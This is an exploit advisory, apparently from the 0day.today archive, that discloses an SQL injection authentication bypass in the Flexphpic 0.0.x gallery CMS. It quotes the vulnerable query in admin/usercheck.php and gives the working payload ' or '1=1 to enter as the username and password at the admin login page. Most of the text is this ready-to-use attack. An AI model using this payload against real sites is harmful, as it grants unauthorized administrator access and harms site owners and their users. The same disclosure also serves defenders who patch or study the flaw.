id: 4575
date: 12/30/2008
title: Flexphpic 0.0.x (Auth Bypass) SQL Injection Vulnerability
author: S.W.A.T.
cves: 

=========================================================
Flexphpic 0.0.x (Auth Bypass) SQL Injection Vulnerability
=========================================================


#############################################
Autore: S.W.A.T.
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
 
I'll Be   A C I D A L !!!



#  0day.today [2023-03-26]  #